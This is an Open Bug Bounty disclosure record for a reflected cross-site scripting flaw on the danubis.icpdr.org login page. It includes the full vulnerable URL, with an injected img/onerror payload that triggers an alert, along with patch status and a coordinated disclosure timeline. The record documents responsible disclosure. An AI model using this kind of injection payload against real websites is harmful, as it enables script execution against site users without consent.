danubis.icpdr.org XSS vulnerability

2016-02-19T17:11:00
ID OBB:136455
Type openbugbounty
Reporter m3tal
Modified 2017-07-26T17:22:00

Description

Vulnerable URL:
http://danubis.icpdr.org/pls/danubis_sso/danubis_sso.danubis_login?site2pstoretoken=v1.1~1354~A29K%22%3E%3Cimg%20src=x%20onerror=alert%28/XSSPOSED/%29%3E/9E4673FF1F6EC12DACF72F77C0E51C1A59A851E02545D26FF12D253CED42141E4906A2FB56BD61DE51F799D435BD7493568A41A1E2D72F50BEA7D9F9BC09D7F322950E70E4360B85CDFF5407E2BA3709E7DF1867F0A0D2B353E2CD7A9EB569378A03D200D0993C2E496B04BE481B4F249351BD872A241EE1F5EF42C86701B51115B52C4276259A27D6EB5561C7F3C4F576F8F8D2833DA145E9C7FE4018E9423A76C8A6B41723B6F989D9C5C1088B7F17040F315BCD7051613F5323901550A715AB0D2E5C840FB66AF53D80A82A98D73A9EF058ABA27181E265F56D7E1C5CDFD6E3E69E904CA41&p;_error_code=&subscribername;=&ssousername;=&p;_cancel_url=http://danubis.icpdr.org/pls/danubis/DANUBIS_DB.DYN_NAVIGATOR.show&p;_submit_url=http://danubis.icpdr.org/pls/danubis_sso/DANUBIS_SSO.wwsso_app_admin.ls_login
Details:

Description| Value
---|---
Patched:| Yes, at 26.07.2017
Latest check for patch:| 26.07.2017 17:22 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 5
VIP website status:| No
Check danubis.icpdr.org SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 19 February, 2016 17:11 GMT
Generic security notifications sent to website owner| 19 February, 2016 17:14 GMT
Notification sent to subscribers (without technical details)| 19 February, 2016 18:17 GMT
Vulnerability details disclosed by researcher| 26 February, 2016 18:11 GMT
Vulnerability patched by the website owner| 26 July, 2017 17:22 GMT